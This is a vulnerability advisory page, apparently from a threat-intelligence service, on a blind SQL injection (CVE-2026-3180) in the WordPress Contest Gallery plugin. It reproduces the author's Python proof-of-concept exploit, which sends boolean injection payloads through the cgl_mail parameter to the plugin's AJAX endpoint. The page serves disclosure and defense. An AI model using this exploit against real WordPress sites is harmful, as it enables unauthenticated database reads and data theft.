WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
WordPress Contest Gallery plugin versions 28. 1. 4 and earlier contain an unauthenticated blind SQL injection vulnerability. The issue arises from unsafe handling of the cgl_mail parameter, where sanitize_email() does not remove single quote characters in the local part of email addresses. This allows user input to reach the WordPress database query function without proper parameterization, enabling boolean-based blind SQL injection attacks without authentication. Exploit code is publicly available in Python. No official patch or vendor advisory is currently provided.
AI Analysis
Technical Summary
The WordPress Contest Gallery plugin (<= 28.1.4) is vulnerable to an unauthenticated blind SQL injection via the cgl_mail parameter. The vulnerability occurs because sanitize_email() preserves single quotes in the local part of email addresses, allowing crafted input to be passed directly to wpdb->get_row() without using the prepare() method for safe SQL parameterization. This flaw enables attackers to perform boolean-based blind SQL injection attacks without needing authentication. The vulnerability has been assigned CVE-2026-3180. Exploit code written in Python demonstrates how to send malicious payloads to the plugin's AJAX endpoint to confirm the vulnerability.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to perform boolean-based blind SQL injection attacks against the WordPress database used by the Contest Gallery plugin. This could allow the attacker to infer sensitive information from the database, potentially leading to data disclosure or further compromise depending on the database contents and privileges. There is no evidence of known exploits in the wild at this time.
Mitigation Recommendations
No official patch or vendor advisory is currently available for this vulnerability. Patch status is not yet confirmed — check the vendor's website and official plugin repository for updates. Until a fix is released, consider disabling or removing the affected plugin version to prevent exploitation. Monitor official sources for remediation guidance.
Indicators of Compromise
- exploit-code: # Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection # Google Dork: N/A # Date: 2026-06-02 # Exploit Author: cardosource # Vendor Homepage: https://contest-gallery.com/ # Software Link: https://wordpress.org/plugins/contest-gallery/ # Version: <= 28.1.4 # Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment) # CVE: 2026-3180 """ Description A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_maili parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection. Authentication Required: No """ import requests import json NONCE = " " URL = "http://localhost:8080/wp-admin/admin-ajax.php" endpoint = "/wp-admin/admin-ajax.php" url = "http://localhost:8080/" payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com" def send_payload(mail): data = { "action": "post_cg1l_resend_unconfirmed_mail_frontend", "cgl_mail": mail, "cgl_page_id": "1", "cgl_activation_key": "", "cg_nonce": NONCE, } return requests.post(URL, data=data) r_true = send_payload("qualquer'OR/**/1=1#@teste.com") if r_true.status_code == 200: status_code = r_true.status_code banner = f""" CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi payload :........................{payload} end point :........................{endpoint} url :..............................{url} status :...........................{status_code} nonce :............................{NONCE} """ print(banner) print(f"Body length: {len(r_true.text)} chars") poc =f'''\nmariadb wordpress_db -e " SELECT * FROM wp_contest_gal1ery_create_user_entries ORDER BY Tstamp DESC LIMIT 1115;"''' print(poc)
WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
Description
WordPress Contest Gallery plugin versions 28. 1. 4 and earlier contain an unauthenticated blind SQL injection vulnerability. The issue arises from unsafe handling of the cgl_mail parameter, where sanitize_email() does not remove single quote characters in the local part of email addresses. This allows user input to reach the WordPress database query function without proper parameterization, enabling boolean-based blind SQL injection attacks without authentication. Exploit code is publicly available in Python. No official patch or vendor advisory is currently provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The WordPress Contest Gallery plugin (<= 28.1.4) is vulnerable to an unauthenticated blind SQL injection via the cgl_mail parameter. The vulnerability occurs because sanitize_email() preserves single quotes in the local part of email addresses, allowing crafted input to be passed directly to wpdb->get_row() without using the prepare() method for safe SQL parameterization. This flaw enables attackers to perform boolean-based blind SQL injection attacks without needing authentication. The vulnerability has been assigned CVE-2026-3180. Exploit code written in Python demonstrates how to send malicious payloads to the plugin's AJAX endpoint to confirm the vulnerability.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to perform boolean-based blind SQL injection attacks against the WordPress database used by the Contest Gallery plugin. This could allow the attacker to infer sensitive information from the database, potentially leading to data disclosure or further compromise depending on the database contents and privileges. There is no evidence of known exploits in the wild at this time.
Mitigation Recommendations
No official patch or vendor advisory is currently available for this vulnerability. Patch status is not yet confirmed — check the vendor's website and official plugin repository for updates. Until a fix is released, consider disabling or removing the affected plugin version to prevent exploitation. Monitor official sources for remediation guidance.
Technical Details
- Version
- <= 28.1.4
- Vendor
- https://contest-gallery.com
- Application
- https://wordpress.org/plugins/contest-gallery
- Author
- cardosource
- Platform
- Docker - PHP 8.2/Apache + MariaDB
- Edb Id
- 52609
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection # Google Dork: N/A # Date: 2026-06-02 # Exploit Author: cardosource # Vendor Homepage: https://contest-gallery.com/ # Software Link: https://wordpress.org/plugins/contest-gallery/ # Version: <= 28.1.4 # Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment) # CVE: 2026-3180 """ Description A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is... (1502 more characters)
Threat ID: 6a234b62e29bf47b50cd7c41
Added to database: 6/5/2026, 10:19:14 PM
Last enriched: 6/5/2026, 10:19:18 PM
Last updated: 6/6/2026, 1:41:30 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.